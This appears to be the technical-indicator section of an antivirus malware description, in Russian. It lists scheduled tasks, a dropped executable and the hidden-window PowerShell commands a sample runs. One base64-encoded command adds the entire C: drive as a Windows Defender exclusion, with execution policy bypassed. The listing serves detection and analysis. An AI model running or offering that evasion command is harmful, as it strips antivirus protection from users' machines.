Техническая информация
- <SYSTEM32>\tasks\microsoft\windows\inputblocksize\stacktrace
- <SYSTEM32>\tasks\kejjv
- %LOCALAPPDATA%\inputblocksize\fdgspyt\stacktrace.exe
- <SYSTEM32>\tasks\kejjv
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
- '<SYSTEM32>\taskeng.exe' {802775EB-2685-4E15-9F4E-E97AF028A8AE} S-1-5-21-1960123792-2022915161-3775307078-1001:tsafpe\user:S4U
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==